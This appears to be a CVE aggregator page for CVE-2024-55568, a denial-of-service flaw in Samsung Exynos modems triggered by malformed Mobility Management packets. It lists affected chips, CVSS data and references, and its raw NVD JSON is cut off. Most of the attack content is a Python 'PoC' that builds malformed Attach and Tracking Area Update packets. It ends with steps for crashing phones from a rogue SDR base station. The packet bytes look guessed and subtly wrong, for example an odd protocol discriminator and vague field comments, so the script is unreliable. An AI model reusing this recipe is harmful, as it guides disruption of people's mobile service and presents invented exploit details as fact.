CVE-2024-55568

Description

An issue was discovered in Samsung Mobile Processor, Wearable Processor, and Modem Exynos 980, 990, 850, 1080, 2100, 1280, 2200, 1330, 1380, 1480, 2400, 9110, W920, W930, W1000, Modem 5123, Modem 5300, Modem 5400. The absence of a NULL check leads to a Denial of Service when an attacker sends malformed MM packets to the target.

CVSS Details

CVSS Score

7.5

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:o:samsung:exynos_1080_firmware:-:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:h:samsung:exynos_1080:-:*:*:*:*:*:*:* - NOT VULNERABLE

cpe:2.3:o:samsung:exynos_1330_firmware:-:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:h:samsung:exynos_1330:-:*:*:*:*:*:*:* - NOT VULNERABLE

cpe:2.3:o:samsung:exynos_1380_firmware:-:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:h:samsung:exynos_1380:-:*:*:*:*:*:*:* - NOT VULNERABLE

cpe:2.3:o:samsung:exynos_1480_firmware:-:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:h:samsung:exynos_1480:-:*:*:*:*:*:*:* - NOT VULNERABLE

cpe:2.3:o:samsung:exynos_2100_firmware:-:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:h:samsung:exynos_2100:-:*:*:*:*:*:*:* - NOT VULNERABLE

Samsung Exynos 980

Samsung Exynos 990

Samsung Exynos 850

Samsung Exynos 1080

Samsung Exynos 2100

Samsung Exynos 1280

Samsung Exynos 2200

Samsung Exynos 1330

Samsung Exynos 1380

Samsung Exynos 1480

Samsung Exynos 2400

Samsung Exynos 9110

Samsung Wearable Processor W920

Samsung Wearable Processor W930

Samsung Wearable Processor W1000

Samsung Modem 5123

Samsung Modem 5300

Samsung Modem 5400

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2024-55568 PoC - Samsung Exynos MM Packet NULL Pointer Dereference DoS
# This PoC demonstrates the concept of triggering NULL pointer dereference
# by sending malformed MM (Mobility Management) packets to vulnerable
# Samsung Exynos baseband processors.

import struct
import socket

# 3GPP MM Protocol - Mobility Management message types
MM_MESSAGE_TYPES = {
    'ATTACH_REQUEST': 0x01,
    'ATTACH_ACCEPT': 0x02,
    'ATTACH_COMPLETE': 0x03,
    'TRACKING_AREA_UPDATE_REQUEST': 0x48,
    'TRACKING_AREA_UPDATE_ACCEPT': 0x49,
    'IDENTITY_REQUEST': 0x55,
    'IDENTITY_RESPONSE': 0x56,
    'AUTHENTICATION_REQUEST': 0x52,
    'AUTHENTICATION_RESPONSE': 0x53,
}

def craft_malformed_mm_packet():
    """
    Craft a malformed MM packet that triggers NULL pointer dereference
    in vulnerable Samsung Exynos baseband processors.
    
    The vulnerability exists due to missing NULL check when parsing
    certain MM message fields. By sending a packet with specific
    malformed IE (Information Element), we can trigger the bug.
    """
    packet = bytearray()
    
    # Protocol Discriminator: EPS Mobility Management (0x7E)
    packet.append(0x7E)
    
    # Security header type: Plain MM message (0x00)
    packet.append(0x00)
    
    # Message type: ATTACH_REQUEST (0x01)
    packet.append(MM_MESSAGE_TYPES['ATTACH_REQUEST'])
    
    # Malformed EPS mobile identity - triggers NULL pointer path
    # Type of identity: IMSI (0x01), odd/even indicator set abnormally
    packet.append(0x01)
    
    # Corrupted length field causing buffer underflow
    packet.append(0xFF)
    
    # Fill with payload that leads to NULL dereference
    for i in range(32):
        packet.append(0x00)
    
    return bytes(packet)

def craft_tau_malformed_packet():
    """
    Alternative: Malformed Tracking Area Update Request packet
    targeting the NULL pointer dereference vulnerability.
    """
    packet = bytearray()
    
    # Protocol Discriminator: EPS Mobility Management (0x7E)
    packet.append(0x7E)
    
    # Security header type
    packet.append(0x00)
    
    # Message type: TRACKING_AREA_UPDATE_REQUEST (0x48)
    packet.append(MM_MESSAGE_TYPES['TRACKING_AREA_UPDATE_REQUEST'])
    
    # EPS update type: TA updating with active flag
    packet.append(0x00)
    
    # NAS key set identifier
    packet.append(0x00)
    
    # Old GUTI - malformed to trigger NULL path
    packet.append(0xF0)
    packet.append(0x00)
    packet.append(0x00)
    packet.append(0x00)
    packet.append(0x00)
    
    return bytes(packet)

def send_via_fake_bs():
    """
    Simulate sending the malformed packet via a rogue/fake base station.
    In real scenario, this would require SDR (Software Defined Radio)
    equipment like USRP or bladeRF to transmit on cellular frequencies.
    """
    payload = craft_malformed_mm_packet()
    print(f"[*] Crafted malformed MM packet ({len(payload)} bytes)")
    print(f"[*] Hex: {payload.hex()}")
    print("[!] Target: Samsung Exynos baseband processor")
    print("[!] Effect: NULL pointer dereference -> baseband crash -> DoS")
    
    # Note: Actual transmission requires SDR hardware
    # Example with srsRAN or OpenBTS:
    # ./srsenb --config-file enb.conf  # Rogue eNodeB
    # Then transmit the crafted MM packet on the downlink
    
    return payload

if __name__ == "__main__":
    print("=" * 60)
    print("CVE-2024-55568 PoC")
    print("Samsung Exynos MM Packet NULL Pointer Dereference DoS")
    print("=" * 60)
    
    # Generate exploit packet
    packet = send_via_fake_bs()
    
    print("\n[*] PoC packet generated successfully")
    print("[*] To exploit in real environment:")
    print("    1. Set up rogue base station using SDR (e.g., USRP)")
    print("    2. Broadcast the malformed MM packet")
    print("    3. Target device's baseband will crash (DoS)")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2024-55568
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2024-55568
[3] CVE Details https://www.cvedetails.com/cve/CVE-2024-55568/
[4] VulDB https://vuldb.com/cve/CVE-2024-55568
[5] https://semiconductor.samsung.com/support/quality-support/product-security-updates/
[6] https://semiconductor.samsung.com/support/quality-support/product-security-updates/cve-2024-55568/

Raw JSON Data

JSON

{"cve": {"id": "CVE-2024-55568", "sourceIdentifier": "[email protected]", "published": "2025-10-20T16:15:36.133", "lastModified": "2025-11-04T13:11:09.347", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "An issue was discovered in Samsung Mobile Processor, Wearable Processor, and Modem Exynos 980, 990, 850, 1080, 2100, 1280, 2200, 1330, 1380, 1480, 2400, 9110, W920, W930, W1000, Modem 5123, Modem 5300, Modem 5400. The absence of a NULL check leads to a Denial of Service when an attacker sends malformed MM packets to the target."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-400"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:samsung:exynos_1080_firmware:-:*:*:*:*:*:*:*", "matchCriteriaId": "43DE4D6F-D662-46F2-93BC-9AE950320BDE"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:samsung:exynos_1080:-:*:*:*:*:*:*:*", "matchCriteriaId": "EE06CD56-8BFD-4208-843A-179E3E6F5C10"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:samsung:exynos_1330_firmware:-:*:*:*:*:*:*:*", "matchCriteriaId": "C2635646-DD6A-4735-8E01-F45445584832"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:samsung:exynos_1330:-:*:*:*:*:*:*:*", "matchCriteriaId": "AA0F8A58-71B7-4503-A03A-6FB4282D75BD"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:samsung:exynos_1380_firmware:-:*:*:*:*:*:*:*", "matchCriteriaId": "D381478B-C638-4663-BD71-144BE4B02E46"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:samsung:exynos_1380:-:*:*:*:*:*:*:*", "matchCriteriaId": "61E72146-72FE-4B54-AB79-3C665E7F016C"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:samsung:exynos_1480_firmware:-:*:*:*:*:*:*:*", "matchCriteriaId": "64897B0D-EBF6-4BEB-BF54-ABCDBFAB45E0"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:samsung:exynos_1480:-:*:*:*:*:*:*:*", "matchCriteriaId": "F3F328B4-0442-4748-B5EE-DD1CEE50D6CF"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:samsung:exynos_2100_firmware:-:*:*:*:*:*:*:*", "matchCriteriaId": "89B88BFE-3C82-498C-8EC1-5784836DB1A1"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:samsung:exynos_2100:-:*:*:*:*:*:*:*", "matchCriteriaId": "9385885D-654A-496E-8029-7C6D9B077193"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:samsung:exynos_2200_firmware:-:*:*:*:*:*:*:*", "matchCriteriaId": "63C0D9AC-BD23-48C9-83E7-301DEC06E583"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:samsung:exynos_2200:-:*:*:*:*:*:*:*", "matchCriteriaId": "A72ADEBB-ED72-4A5B-BB27-95EDE43F8116"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:samsung:exynos_2400_firmware:-:*:*:*:*:*:*:*", "matchCriteriaId": "16D9272E-1794-48FF-B6A4-8F48395BA38E"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:samsung:exynos_2400:-:*:*:*:*:*:*:*", "matchCriteriaId": "932F5FB3-5527-44D7-9DD9-EF03963E3CA3"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:samsung:exynos_850_firmware:-:*:*:*:*:*:*:*", "matchCriteriaId": "1928760C-4FC4-45B0-84FF-C1105CD1DD2A"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:samsung:exynos_850:-:*:*:*:*:*:*:*", "matchCriteriaId": "BB410A6D-642B-49AE-8B1C-EADA953A84DA"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:samsung:exynos_980_firmware:-:*:*:*:*:*:*:*", "matchCriteriaId": "5F18F62E-2012-442E-BE60-6E76325D1824"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:samsung: ... (truncated)